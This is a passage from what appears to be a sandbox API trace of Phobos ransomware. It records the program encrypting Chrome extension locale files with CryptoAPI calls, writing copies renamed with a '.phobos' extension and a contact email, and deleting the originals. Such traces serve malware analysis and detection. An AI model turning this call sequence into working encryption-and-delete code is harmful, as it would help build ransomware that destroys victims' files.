data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.282] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.282] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.282] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.282] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.282] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x152, lpOverlapped=0x0) returned 1 [0151.283] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160, dwBufLen=0x160 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x160) returned 1 [0151.283] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x160, lpOverlapped=0x0) returned 1 [0151.284] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.284] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.284] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.284] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.284] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.284] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.284] CloseHandle (hObject=0x134) returned 1 [0151.284] CloseHandle (hObject=0x138) returned 1 [0151.284] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json")) returned 1 [0151.285] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.286] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=274) returned 1 [0151.286] CloseHandle (hObject=0x138) returned 1 [0151.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json")) returned 0x2020 [0151.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.290] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.290] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.291] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.291] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x112, lpOverlapped=0x0) returned 1 [0151.292] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.292] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.292] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.293] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.293] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.293] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.293] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.293] CloseHandle (hObject=0x138) returned 1 [0151.293] CloseHandle (hObject=0x130) returned 1 [0151.293] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json")) returned 1 [0151.294] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.294] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=268) returned 1 [0151.294] CloseHandle (hObject=0x130) returned 1 [0151.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json")) returned 0x2020 [0151.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.295] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.295] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.295] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.295] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.295] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10c, lpOverlapped=0x0) returned 1 [0151.296] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.296] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.297] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.297] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.297] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.297] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.297] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.297] CloseHandle (hObject=0x130) returned 1 [0151.297] CloseHandle (hObject=0x138) returned 1 [0151.297] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json")) returned 1 [0151.298] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.298] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.299] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=287) returned 1 [0151.299] CloseHandle (hObject=0x138) returned 1 [0151.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json")) returned 0x2020 [0151.299] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.299] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.299] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.299] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.299] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x11f, lpOverlapped=0x0) returned 1 [0151.300] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.300] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.301] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.301] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.301] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.301] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.301] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.302] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.302] CloseHandle (hObject=0x138) returned 1 [0151.302] CloseHandle (hObject=0x130) returned 1 [0151.302] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json")) returned 1 [0151.303] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.304] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=253) returned 1 [0151.304] CloseHandle (hObject=0x130) returned 1 [0151.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json")) returned 0x2020 [0151.304] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.304] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.304] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.305] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.305] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.305] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfd, lpOverlapped=0x0) returned 1 [0151.306] CryptEncrypt (in: hKey=0xa327e8, 